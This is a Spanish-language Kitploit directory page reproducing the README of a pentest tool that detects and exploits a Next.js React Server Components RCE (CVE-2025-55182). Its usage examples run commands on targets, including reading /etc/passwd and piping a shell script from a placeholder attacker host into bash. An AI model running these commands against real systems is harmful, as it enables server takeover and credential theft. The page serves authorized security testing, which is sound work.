Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Un escáner de seguridad basado en Python para detectar y explotar vulnerabilidades de **React Server Components (RSC)** en aplicaciones Next.js. Esta herramienta realiza detección pasiva, fingerprinting activo y pruebas de explotación de RCE. | Kitploit
Herramientas/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
Escáneres de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

Un escáner de seguridad basado en Python para detectar y explotar vulnerabilidades de **React Server Components (RSC)** en aplicaciones Next.js. Esta herramienta realiza detección pasiva, fingerprinting activo y pruebas de explotación de RCE.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 8 mesesAún no revisado

RSC Detector - Escáner de vulnerabilidades de React Server Components

Un escáner de seguridad basado en Python para detectar y explotar vulnerabilidades de React Server Components (RSC) en aplicaciones Next.js. Esta herramienta realiza detección pasiva, fingerprinting activo y pruebas de explotación RCE.

⚠️ ADVERTENCIA: Esta herramienta es solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Obtenga siempre permiso por escrito antes de realizar pruebas.


Características

✅ Detección Pasiva - Analiza HTML, cabeceras y estructura de la página en busca de indicadores RSC
✅ Fingerprinting Activo - Envía cabeceras específicas de RSC para detectar respuestas del servidor
✅ Análisis de Cabeceras HTTP - Identifica cabeceras relacionadas con Next.js y RSC
✅ Explotación RCE - Ejecuta comandos en servidores vulnerables (si es explotable)
✅ Salida de Terminal en Color - Retroalimentación visual mejorada para una mayor legibilidad
✅ Modo Interactivo - Ejecuta múltiples comandos en modo de explotación
✅ Decodificación Robusta - Maneja payloads comprimidos con gzip y binarios


Instalación

Requisitos previos

  • Python 3.8+
  • pip (gestor de paquetes de Python)

Configuración

  1. Clonar el repositorio

    root@kitploit:~
    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Instalar dependencias

    root@kitploit:~
    pip install -r requirements.txt
    

    Paquetes requeridos:

    • requests>=2.28.0 - Biblioteca cliente HTTP
    • urllib3>=1.26.0 - Utilidades HTTP avanzadas
    • colorama>=0.4.6 - Colores de terminal (compatible con Windows)
    • beautifulsoup4 - Análisis de HTML

Uso

Detección Básica (Sin Explotación)

root@kitploit:~
python rsc_detector.py https://example.com

Escaneo Completo con Explotación

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Ejecutar un Comando Específico

root@kitploit:~
python rsc_detector.py https://example.com --exploit --cmd "whoami"

Modo de Explotación Interactivo

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Luego introduzca comandos en el prompt (escriba quit para salir).


Opciones de Línea de Comandos

OpciónDescripción
<URL>URL objetivo (obligatoria). Añade automáticamente https:// si falta
--exploit

Ejemplos

Detectar vulnerabilidad RSC:

root@kitploit:~
python rsc_detector.py https://target.com

Explotar y ejecutar el comando id:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "id"

Explotar y ejecutar cat /etc/passwd:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

Modo interactivo (múltiples comandos):

root@kitploit:~
python rsc_detector.py https://target.com --exploit

Cómo Funciona

1. Escaneo Pasivo

  • Comprueba el marcador window.__next_f (App Router de Next.js)
  • Detecta el Content-Type text/x-component
  • Busca marcadores del Protocolo React Flight
  • Analiza __NEXT_DATA__ y las importaciones de Next.js

2. Análisis de Cabeceras

  • Examina las cabeceras Server, Vary y X-Nextjs-Cache
  • Identifica la presencia de RSC en las cabeceras HTTP

3. Fingerprinting Activo

  • Envía peticiones con la cabecera RSC: 1
  • Analiza la respuesta del servidor a cabeceras específicas de RSC
  • Detecta la estructura del Protocolo React Flight

4. Explotación RCE

  • Construye un payload JSON malicioso que explota la serialización de React Server Components
  • Envía datos de formulario multipart para desencadenar la ejecución de código en el servidor
  • Decodifica la salida de comandos codificada en base64
  • Soporta respuestas comprimidas con gzip

Salida y Resultados

Resultados de Detección

root@kitploit:~
[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible

Salida de Explotación

root@kitploit:~
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root

Detalles de la Vulnerabilidad

CVE-2025-55182 explota:

  • React Server Component (RSC) fallos de serialización
  • Next.js Server Action vulnerabilidades de deserialización
  • Contaminación del prototipo de objetos mediante payloads maliciosos
  • Inyección de comandos a través de child_process.execSync()

Superficie de Ataque

  • Aplicaciones Next.js que usan App Router
  • Server Components con entradas controladas por el usuario
  • Aplicaciones con RSC habilitado pero sin una validación adecuada

Pautas Legales y Éticas

⚠️ Importante

Esta herramienta es ESTRICTAMENTE PARA PRUEBAS DE SEGURIDAD AUTORIZADAS ÚNICAMENTE:

  1. ✅ HACER: Usar en sistemas propios o con permiso por escrito para probar
  2. ✅ HACER: Informar de las vulnerabilidades de forma responsable al proveedor
  3. ✅ HACER: Seguir prácticas de divulgación responsable
  4. ❌ NO HACER: Usar contra sistemas sin autorización
  5. ❌ NO HACER: Usar con fines maliciosos
  6. ❌ NO HACER: Almacenar o ejecutar datos sensibles

El acceso no autorizado a sistemas informáticos es ilegal según:

  • Computer Fraud and Abuse Act (CFAA) - USA
  • Computer Misuse Act 1990 - UK
  • Leyes similares en la mayoría de los países

Divulgación Responsable

Si descubre una vulnerabilidad usando esta herramienta:

  1. NO divulgar públicamente hasta que el proveedor haya aplicado el parche
  2. Contactar directamente con el equipo de seguridad del proveedor
  3. Permitir 90 días para el desarrollo del parche
  4. Coordinar con el proveedor el momento de la divulgación
  5. Acreditarse en los avisos después de la divulgación

Solución de Problemas

Errores de Certificado SSL

La herramienta ignora la verificación SSL por defecto. Para habilitar la verificación:

root@kitploit:~
detector = RSCDetector(url, verify_ssl=True)

Errores de Decodificación Base64

La herramienta automáticamente:

  • Añade padding a cadenas base64 mal formadas
  • Detecta y descomprime payloads gzip
  • Usa caracteres de reemplazo UTF-8 para datos binarios

Sin Clave "digest" en la Respuesta

  • El objetivo puede no ser vulnerable
  • El servidor puede filtrar el payload de explotación
  • Pruebe pruebas manuales o endpoints diferentes

Problemas de Tiempo de Espera

Aumente el tiempo de espera en el código:

root@kitploit:~
response = self.session.get(self.url, timeout=30)  # 30 seconds

Estructura del Proyecto

root@kitploit:~
CVE-2025-55182/
├── README.md                # This file
├── requirements.txt         # Python dependencies
├── rsc_detector.py         # Main scanner & exploit engine
├── rsc_cli.py              # CLI utilities (if present)
├── script.py               # Additional scripts (if present)
├── COLOR_GUIDE.md          # Color output documentation
└── .gitignore              # Git ignore rules

Dependencias

root@kitploit:~
requests>=2.28.0         # HTTP requests
urllib3>=1.26.0          # Advanced HTTP
beautifulsoup4>=4.11.0   # HTML parsing
colorama>=0.4.6          # Terminal colors (Windows)

Instalar todo de una vez:

root@kitploit:~
pip install -r requirements.txt

Consejos de Rendimiento

  • Acelerar la detección: Omite el flag --exploit si solo se está escaneando
  • Pruebas por lotes: Crea un script para escanear múltiples URLs
  • Tiempo de espera de red: Ajusta los valores de timeout para redes lentas
  • Omisión SSL: La verificación está deshabilitada por defecto para mayor flexibilidad

Uso Avanzado

Ejecución de Comandos Personalizados

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"

Redirección de Salida

root@kitploit:~
python rsc_detector.py https://target.com > scan_results.txt 2>&1

Escaneo por Lotes

root@kitploit:~
for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done

Limitaciones

  • ⚠️ Solo funciona en configuraciones vulnerables de Next.js
  • ⚠️ Requiere RSC habilitado en la aplicación objetivo
  • ⚠️ Algunos servidores pueden filtrar o bloquear los payloads de explotación
  • ⚠️ La salida binaria puede no mostrarse correctamente en la terminal
  • ⚠️ La ejecución de comandos depende de los permisos del servidor

Contribuciones

¿Encontraste un error o tienes una mejora? ¡Las contribuciones son bienvenidas!

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad (git checkout -b feature/improvement)
  3. Realiza commit de tus cambios (git commit -am 'Add feature')
  4. Sube la rama (git push origin feature/improvement)
  5. Envía un Pull Request

Aviso Legal

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.

Licencia

Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.


Referencias

  • Documentación de React Server Components
  • Next.js App Router
  • CVE-2025-55182 (Cuando esté disponible)
  • OWASP: Fallos de Inyección

Contacto y Soporte

  • Reportar Vulnerabilidades: Usa divulgación responsable
  • Problemas de Seguridad: No publicar públicamente; contacta directamente con los mantenedores
  • Solicitudes de Funcionalidades: Abre un issue en GitHub

Autor

Creado para investigación de seguridad y pruebas de penetración autorizadas.

Última Actualización: 19 de diciembre de 2025


Registro de Cambios

v1.0.0

  • ✅ Detección pasiva de RSC
  • ✅ Fingerprinting activo
  • ✅ Explotación RCE
  • ✅ Salida de terminal en color
  • ✅ Modo de explotación interactivo
  • ✅ Soporte de descompresión gzip
  • ✅ Decodificación base64 robusta

Recuerda: Un gran poder conlleva una gran responsabilidad. Usa esta herramienta de forma ética y legal.

Descargar herramienta
Habilita la explotación RCE después de la detección
--cmd <command>Ejecuta un comando específico (usar con --exploit)